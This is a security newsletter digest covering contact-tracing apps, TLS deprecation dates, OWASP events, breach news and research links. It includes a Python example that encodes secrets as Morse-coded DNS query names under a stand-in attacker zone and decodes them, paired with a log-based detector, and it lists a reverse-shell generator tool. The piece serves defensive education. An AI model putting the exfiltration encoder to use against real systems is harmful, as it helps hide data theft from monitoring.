Security Stack Sheet #92

 

Word of the Week

 “COVID-19 Government Mobile Apps”

Iran, Colombia, and Italy Put Citizens at Risk with COVID-19 Government Mobile Apps

BEWARE OF FAKE APPS! CHECK THE CREATOR & TRUSTED SOURCES THOROUGHLY!

Also Apple and Google Team Up to ‘Contact Trace’ the Coronavirus

Links HERE and HERE and HERE and HERE and HERE and HERE and HERE and working from home? HERE and HERE

“Also worth reading are this EFF essay, and this ACLU white paper.

Susan Landau on contact tracing apps and how they’re being oversold. And Farzad Mostashari, former coordinator for health IT at the Department of Health and Human Services, on contact tracing apps.”

Bruce Schneier’s opinion:

To me, the real problems aren’t around privacy and security. The efficacy of any app-based contact tracing is still unproven. A "contact" from the point of view of an app isn’t the same as an epidemiological contact. And the ratio of infections to contacts is high. We would have to deal with the false positives (being close to someone else, but separated by a partition or other barrier) and the false negatives (not being close to someone else, but contracting the disease through a mutually touched object). And without cheap, fast, and accurate testing, the information from any of these apps isn’t very useful. So I agree with Ross that this is primarily an exercise in that false syllogism: Something must be done. This is something. Therefore, we must do it. It’s techies proposing tech solutions to what is primarily a social problem.

As long as 1) every contact does not result in an infection, and 2) a large percentage of people with the disease are asymptomatic and don’t realize they have it, I can’t see how this sort of app is valuable. If we had cheap, fast, and accurate testing for everyone on demand…maybe. But I still don’t think so.

AND

“Immunity Passports”

Several countries have begun floating the idea of an “immunity passport,” which would certify that someone is immune to COVID-19. Not only does the idea raise a number of security and privacy issues, but there are still unknowns about immunity to this particular virus.
[Neely]
I carry an immunization record with me when traveling internationally, typically a paper form, as well as a digital backup, to be surrendered for examination by border control based on the risk of your origin point, or verification that you meet local mandatory immunization requirements. While COVID-19 changes those factors, the bigger issue is having an internationally recognized indicator of immunity to COVID-19.

Links HERE and HERE

 

Bonus


Link HERE – thread


Link HERE

 

Crypto challenge of the week

dogcat

I made a website where you can look at pictures of dogs and/or cats!

Link HERE

Hacky Easter Archive

Link HERE

 

Dates

  • May 25th 2018: Almost 2 years of GDPR live! See incidents section below. GDPR Enforcement Tracker Link HERE – thanks to Marius
  • 1st January 2020 – The California Consumer Privacy Act (CCPA) becomes effective Link HERE
  • Now: TLS1.2 mandatory for proper security HTTPS everywhere HERE
  • DO NOT DELAY TLS1.2 migration LATER THAN JUNE 2020 or A FEW THINGS WILL STOP WORKING!

[Browsers, Office365, Cisco and many others]

  • January 2020 – Qualys SSLLabs rates a TLS1.0 setup as B – Qualys will downgrade you HERE DONE
  • June 2020 – Microsoft plans to deprecate TLS versions 1.0 and 1.1 in Office 365 and Office 365 GCC – HERE
  • 31st of December 2020 – Brexit Finalised?
  • 1st of June 2020 – Freedom from viruses


Link HERE

  • November 3rd 2020: Trump’s second term start
  • 2022 – First trip to Mars according to Elon Musk
  • 2023 – 3DES is deprecated for all new applications and usage is disallowed after 2023 HERE
  • 2024 – Back to the Moon according to Trump and NASA
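The TLS 1.2 and 3DES items above as working configuration, added here as an example (it is not code from any of the linked sources): Python's standard-library ssl module, a legacy client context next to a hardened one, and a small audit function that reports whether a given context meets the policy. Nothing opens a network connection; the function names are chosen for this demo.

```python
"""Added example: enforce the TLS 1.2 / no-3DES policy with Python's ssl module.

Not code from the newsletter's linked sources. Function names are chosen here;
nothing below opens a socket, it only builds and inspects SSLContext objects.
"""
import ssl

POLICY_MIN = ssl.TLSVersion.TLSv1_2


def legacy_context() -> ssl.SSLContext:
    """A context that lets the library negotiate down to whatever it still supports."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    # TLS 1.0/1.1 become negotiable if the underlying OpenSSL still allows them.
    ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
    return ctx


def hardened_context() -> ssl.SSLContext:
    """Certificate verification on, TLS 1.2 as the floor, 3DES suites removed."""
    ctx = ssl.create_default_context()   # CERT_REQUIRED + check_hostname
    ctx.minimum_version = POLICY_MIN
    # OpenSSL cipher-string syntax: keep the default list, strip triple-DES suites.
    ctx.set_ciphers("DEFAULT:!3DES:!aNULL:!eNULL")
    return ctx


def audit_context(ctx: ssl.SSLContext) -> list:
    """Return the policy findings for a context; an empty list means it passes."""
    findings = []
    if ctx.minimum_version < POLICY_MIN:
        findings.append(f"minimum_version is {ctx.minimum_version.name}, TLS 1.2 required")
    des3 = [c["name"] for c in ctx.get_ciphers()
            if "3DES" in c["name"] or "CBC3" in c["name"]]
    if des3:
        findings.append("3DES cipher suites still enabled: " + ", ".join(des3))
    if ctx.verify_mode != ssl.CERT_REQUIRED or not ctx.check_hostname:
        findings.append("peer certificate or hostname is not verified")
    return findings


if __name__ == "__main__":
    for name, ctx in (("legacy", legacy_context()), ("hardened", hardened_context())):
        print(name, audit_context(ctx) or "OK")
```

The audit only inspects what the process would offer; whether a remote endpoint actually accepts TLS 1.2 is a separate check (SSLLabs, or `openssl s_client -tls1_2`). Note that newer Python and OpenSSL builds already refuse TLS 1.0/1.1 by default, so the legacy context may be impossible to reproduce on an up-to-date host, which is exactly the breakage the June 2020 deadline warns about.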

 

Book of the month

Hakin9 magazine Vol 11 No 8


Link HERE

Protecting Your Web Applications

Solutions and Strategies to Combat Cybersecurity Threats

The rise of cloud computing, use of open source technologies, new data-processing requirements, complexity of web applications, and an increase in the overall sophistication of attackers have combined to create an extremely challenging environment for IT security leadership. Given how critical websites, applications, and online services have become to supporting revenue and productivity, there is nothing more important for your business than ensuring that your digital assets are available and protected at all times. Consider the impact of cyberthreats on your business: customer loss, brand reputation damage or permanent loss of revenue, and team culture demise. In this report, we examine the increasing cyberthreat landscape and take a detailed look at the major threat patterns businesses and security professionals currently experience. We explain how attackers have become so successful and offer remedies to prevent attacks and fix existing vulnerabilities. And, finally, we look at current and emerging trends in efforts to move to cloud-based security, outsourced services, and third-party hosting options.

Link HERE

 

Comic of the week

 - Dilbert by Scott Adams

 

##Some OWASP stuff first

-How To Start A Career in Application Security

Learn from global experts how to launch your AppSec career. What are the careers in Application Security? What is required for an AppSec career? Which certifications are required? We will discuss what works for these experts and what they have seen work for friends: everything that can help a fresher make an entry into the Application Security domain, or help those already in it understand how to grow and mature like a pro!

Link HERE

-Mark Merkow — Secure, Resilient, and Agile Software Development

Mark will discuss how application security and the Agile software development methodology fit together.

Link HERE

-Remember: OWASP OpenSAMM v2.0

How mature are your software security practices?

SAMM Website

Link HERE, CI/CD SAMM HERE and summit event HERE

-How to Write Insecure Code

The idea for this article comes from Roedy Green’s How to Write Unmaintainable Code. You may find the one-page version more readable. Actually, making your code unmaintainable is a great first step towards making it insecure, and there are some great ideas in this article, particularly the section on camouflage.

Link HERE

 

Events

OWASP events HERE

OWASP Foundation will be holding a Virtual AppSec Days on April 27-29th

Registration will open on MONDAY, April 6

Link HERE

OWASP Newcastle May meetup

This will now be an online-only event. The stream will start around 1815.
Link for the stream:
HERE

Link HERE

Isolation Con on Twitch – check below!


Link HERE

Application Security For Developers – Learning Defence by Offense

Join the Webinar: Tuesday 21st April, 12:00 – 13:00 BST

Join Rohit Salecha, Black Hat Trainer and accredited Pen Tester from NotSoSecure, to discuss why, with web application vulnerabilities on the rise, it’s essential that developers are educated in response to the growing risk.

Link HERE

Maintaining Secure Development Practices in a WFH Environment

Thursday, April 23 at 8:00am PDT |11:00am EDT | 16:00 BST

Link HERE

 

Incidents

Global ALERT level


BLUE or GUARDED indicates a general risk of increased hacking, virus, or other malicious activity. The potential exists for malicious cyber activities, but no known exploits have been identified, or known exploits have been identified but no significant impact has occurred. 


Incident data HERE Find your country


NCSC Weekly Threat Report


Bumper “Patch Tuesday” releases from Microsoft

Amongst the 113 security updates in the April release from Microsoft were patches for 3 zero-day vulnerabilities. This follows a similarly large release of 115 fixes in March.

US issues North Korean cyber threat warning

Officials in the United States have issued new guidance on the cyber threat posed by North Korea.
The report – jointly published by the US Departments of State, the Treasury, Homeland Security, and the FBI – highlights the threat posed by North Korea and gives advice on how to stay safe online.

Hackers claim to hold European energy giant EDP to ransom

Researchers are reporting that cyber attackers have stolen sensitive files belonging to Energias de Portugal (EDP) using the Ragnar Locker ransomware.

In a new web post, hackers claim that they have downloaded more than 10TB of private information. They threaten to release this information if EDP doesn’t pay a ransom of €10 million

Link HERE – Report Vulns to NCSC HERE and Who is Government Security HERE

API Security Issue 79 – 1.4 million doctor records scraped using API

Unprotected APIs have allowed hackers to compile and put up for sale a list of 1.4 million US doctors, and GitLab has published details of the API vulnerability it recently fixed. We also have a recording of a recent API security conference talk and an announcement of an upcoming training on OAuth and OpenID Connect.

Link HERE

 

Incidents & events detail

Zoom Brings in Help to Address Security Issues

Zoom is calling in experts to help it address security and privacy concerns. With millions of people working at home during the COVID-19 epidemic, Zoom’s popularity has ballooned. It has also been subjected to greater scrutiny by both hackers and security experts, who have unearthed a number of security and privacy issues. The company has hired numerous security consultants, many of whom are former privacy and security experts from other high-profile tech companies. (Please note that the WSJ story is behind a paywall.)


[Pescatore]
Zoom’s CEO publicly apologized for “falling short” on security and privacy and Zoom has taken a lot of important steps to improve. But, they aren’t the only video conferencing approach in use and we know attackers are going after them all. SANS is doing a series of webinars on the key elements to making sure all remote work is done as securely as possible that you can access at www.sans.org/webcasts/.
[Neely]
There is a lot of FUD around Zoom, and rather than drop it like a hot potato, consideration needs to be given to implementing it securely and applying fixes as they come out. Before jumping to another solution, careful analysis of the security, user experience, and transition costs needs to be performed.

Link HERE and Zoombombing HERE

Facebook Wanted NSO Spyware to Monitor Users, NSO CEO Claims

In a court-filed declaration, NSO Group’s CEO says Facebook tried to buy an Apple spying tool in 2017

Link HERE

FBI Releases Guidance on Defending Against VTC Hijacking and Zoom-bombing

Links HERE and HERE

Rush to adopt online learning under COVID-19 exposes schools to cyberattacks

Link HERE

Russian telco Rostelecom hijacks traffic for IT giants, including Google, Amazon and Facebook

Link HERE

Exclusive: Amazon deploys thermal cameras at warehouses to scan for fevers faster

Link HERE

COVID-19’s impact on Tor

We had to let go of 13 great people who helped make Tor available to millions of people around the world. We will move forward with a core team of 22 people, and remain dedicated to continuing our work on Tor Browser and the Tor software ecosystem

Link HERE

OVER 460 VULNERABILITIES RESOLVED IN TENTH BUG BOUNTY CHALLENGE WITH U.S. DEPARTMENT OF DEFENSE

Link HERE

CVE-2020-1027 | Windows Kernel Elevation of Privilege Vulnerability

Link HERE

Google Removes Malicious Chrome Extensions From Web Store

Google has pulled nearly 50 malicious extensions from the Chrome Web Store. These bad apps were pretending to be legitimate cryptocurrency wallet apps, but actually stole cryptowallet keys and other sensitive information.
[Pescatore]
A key element of the world recovering from the COVID-19 virus is testing, and a critical part of making widespread testing work will be cellphone apps used for demonstrating an individual’s testing status and tracing possible contacts if someone is found to be infected. Google and Apple need to really step up the security of apps and extensions that make it through their testing. Longer times for most apps and extensions to come out of the process are worth it now to significantly elevate the trust/safety level of phones for this coming critical use. Google and Apple are already working together on the tracing side of the problem. A joint effort on radically reducing “badware” that gets through their testing regimes should be a key part of that

Link HERE

TikTok users beware: Hackers could swap your videos with their own

Link HERE

Report: Massive Data Leak Exposes US Energy Sector to Cyberattack

Date discovered: 10th March 2020

Date vendors contacted: 16th March and 2nd April 2020

Date of contact attempt with AWS: 18th and 30th March 2020

Date of Response: 8th April 2020

Date of Action: 8th April 2020

Link HERE

PoetRAT Uses Covid-19 Lures To Attack Azerbaijan

Link HERE

Over 700 Malicious Typosquatted Libraries Found On RubyGems Repository

Link HERE

 

Research of the week

Featuring – Data Exfiltration over DNS Queries via Morse Code

Surprisingly, this technique is very old (over 20 years), but it is still very effective today.

You may ask why we don’t just upload the compromised files to cloud storage or transfer them directly over protocols like HTTP, FTP, SSH, Telnet and so on. Exfiltration over those protocols requires the target machine to initiate an outbound connection to the attacker, and that will be noticed by any basic firewall or egress-monitoring tool.

DNS exfiltration needs no such connection: the target only asks its local recursive resolver, which forwards the query to the attacker’s authoritative name server for the zone. The data rides inside the query name itself, so it slips past (almost!) all basic security tools, unless you have a solution in place that analyses outbound DNS queries.

Link HERE
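The technique above round-tripped in Python, added here as an example (it is not the article’s own tooling): the victim side hex-encodes and Morse-encodes the data, maps dots and dashes onto characters a DNS label may contain, and spreads the result across query names under an attacker-controlled zone; the authoritative server side reassembles it. The second half is the detection the last paragraph alludes to, a heuristic run over constructed resolver-log lines. The label alphabet, the `s<n>` sequence label, the zone exfil.example.com and the log lines are all assumptions for the demo.

```python
"""Added example: Morse-over-DNS exfiltration round-tripped, plus a resolver-log heuristic.

Not the article's code. Everything concrete here is an assumption for the demo: the
DNS-safe alphabet ('0' = dot, '1' = dash, 'x' between Morse symbols), the sequence
label 's<n>', the collection zone exfil.example.com, and the log lines at the bottom.
"""
from collections import defaultdict

# Data is hex-encoded first, so Morse for the 16 hex digits is all that is needed.
MORSE = {
    "0": "-----", "1": ".----", "2": "..---", "3": "...--", "4": "....-",
    "5": ".....", "6": "-....", "7": "--...", "8": "---..", "9": "----.",
    "A": ".-", "B": "-...", "C": "-.-.", "D": "-..", "E": ".", "F": "..-.",
}
FROM_MORSE = {v: k for k, v in MORSE.items()}
LABEL_MAX = 63    # RFC 1035: one label is at most 63 octets
NAME_MAX = 253    # RFC 1035: a name is at most 255 octets on the wire, 253 as text
ZONE = "exfil.example.com"   # attacker-controlled zone (assumption)


def encode_labels(data: bytes) -> list:
    """bytes -> hex -> Morse -> label-safe text, cut into 63-octet labels."""
    morse = "x".join(MORSE[h] for h in data.hex().upper())
    text = morse.replace(".", "0").replace("-", "1")
    return [text[i:i + LABEL_MAX] for i in range(0, len(text), LABEL_MAX)]


def build_queries(data: bytes, zone: str = ZONE, per_query: int = 3) -> list:
    """Victim side: names of the form s<seq>.<label>[.<label>...].<zone>, one per query."""
    labels = encode_labels(data)
    names = []
    for seq, i in enumerate(range(0, len(labels), per_query)):
        name = ".".join([f"s{seq}"] + labels[i:i + per_query] + [zone])
        if len(name) > NAME_MAX:
            raise ValueError("name exceeds 253 octets; lower per_query")
        names.append(name)
    return names


def decode_queries(names: list, zone: str = ZONE) -> bytes:
    """Attacker's authoritative server: reorder by seq, undo the mapping, decode Morse."""
    chunks = {}
    for name in names:
        labels = name[: -(len(zone) + 1)].split(".")   # strip ".<zone>"
        chunks[int(labels[0][1:])] = "".join(labels[1:])
    morse = "".join(chunks[k] for k in sorted(chunks)).replace("0", ".").replace("1", "-")
    if not morse:
        return b""
    return bytes.fromhex("".join(FROM_MORSE[sym] for sym in morse.split("x")))


def is_suspicious(qname: str, zone_labels: int = 2) -> bool:
    """A long subdomain label drawn from a tiny alphabet is not how hosts get named.
    zone_labels=2 assumes a two-label registrable domain; use a public-suffix list for real."""
    sub = qname.rstrip(".").split(".")[:-zone_labels]
    if not sub:
        return False
    longest = max(sub, key=len)
    return len(longest) > 30 or (len(longest) >= 20 and len(set(longest)) <= 3)


def scan_log(lines: list) -> dict:
    """Resolver-log sweep over constructed '<ts> <client> <qname>' lines: hits are grouped
    per (client, zone) so one machine talking to one zone stands out as a unit."""
    hits = defaultdict(list)
    for line in lines:
        _ts, client, qname = line.split()
        if is_suspicious(qname):
            zone = ".".join(qname.rstrip(".").split(".")[-2:])
            hits[(client, zone)].append(qname)
    return dict(hits)


SECRET = b"user=admin;pass=Hunter2"   # constructed payload
SAMPLE_LOG = [f"2020-04-16T10:00:0{i} 10.0.0.5 {q}"
              for i, q in enumerate(build_queries(SECRET))] + [
    "2020-04-16T10:00:05 10.0.0.7 www.google.com",
    "2020-04-16T10:00:06 10.0.0.7 _ldap._tcp.dc.corp.example.com",
]

if __name__ == "__main__":
    queries = build_queries(SECRET)
    print(f"{len(queries)} queries, e.g. {queries[0][:40]}...")
    assert decode_queries(queries) == SECRET
    for key, names in scan_log(SAMPLE_LOG).items():
        print("flagged", key, len(names), "names")
```

Run it and the two exfil names are flagged while the LDAP SRV lookup under the same registrable domain is not. The per-name test is only a start: a real tool sends thousands of these, so count distinct names per client and zone over a time window as well, and expect to allow-list endpoint products that legitimately encode hashes into DNS labels.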

New Stealth Magecart Attack Bypasses Payment Services Using Iframes

PCI compliant payment services hosted within an iframe are not immune from Magecart attacks. Website owners are still responsible for any stolen personally identifiable information (PII) or resulting fines. The PerimeterX research team has uncovered a novel technique for bypassing hosted fields iframe protection, which enables Magecart attackers to skim credit card data while allowing successful payment transactions. This stealthy attack technique gives no indication of compromise to the user or the website admin, enabling the skimming to persist on checkout pages for a long time. The users don’t suspect any malicious activity since the transaction succeeds as expected. In this blog post we examine an active use of this technique that targets websites using the popular payment provider Braintree, a subsidiary of PayPal.

Our research team has been actively tracking Inter, a popular digital skimming toolkit used to launch Magecart attacks. Inter is widely known for being sold as a complete digital skimming kit and its ability to easily adapt to many checkout pages on e-commerce sites

Link HERE

Interesting stats:

Link HERE

ANALYZING THE RACCOON STEALER

An infostealer is a type of malware focused on gathering sensitive and confidential information from the compromised system. While this information is often related to the user’s credentials, infostealers have also been known to seek out financial data and personal information. The research performed by CyberArk Labs focused on the methods and techniques that a typical infostealer leverages for stealing sensitive user data, and on what clients (a.k.a. cybercriminals) are able to retrieve with a low-priced infostealer such as Raccoon.

Link HERE

Remember: Setting the Record Straight: containers vs. Zones vs. Jails vs. VMs

I personally love Zones, Jails, and VMs and I think they all have a particular use case. The confusion with containers primarily lies in assuming they fulfill the same use case as the others; which they do not. Containers allow for a flexibility and control that is not possible with Jails, Zones, or VMs. And THAT IS A FEATURE

Link HERE

 

Tool of the week

Shellerator

Simple CLI tool for the generation of bind and reverse shells in multiple languages

Link HERE

Automate Security Testing with ZAP and GitHub Actions

zap-action

Link HERE

Is BGP safe yet? No. – from Cloudflare

Test your ISP


Link HERE

 

Other interesting articles 

##Why is ransomware still a thing? One-in-three polled netizens say they would cave to extortion demands

American young adults are easiest marks for criminals, study reckons

Link HERE

 

##The Challenge of Software Liability

Liability for insecure software is already a reality. The question is whether Congress will step in to give it shape and a coherent legal structure. Broadly speaking, Congress could do this in one of two ways. It could create a legal framework for claims brought by private citizens or state attorneys general. Or it could delegate the regulation of software security to an agency like the Federal Trade Commission (FTC)

Link HERE – thanks to TK

 

##And finally, how to devise Strategy Under times of Uncertainty

What makes for a good strategy in highly uncertain business environments? Some executives seek to shape the future with high-stakes bets


Link HERE

 

##HACKING, TOOLS and FUN – CHECK BELOW!

AppSec Ezine

Must see

URL: https://blog.isec.pl/xss-fun-with-animated-svg/

Description: XSS fun with animated SVG.

URL: http://adventures.michaelfbryan.com/posts/lastpass/

Description: How I Reverse Engineered the LastPass CLI Tool.

Links HERE and credits to HERE

 

 
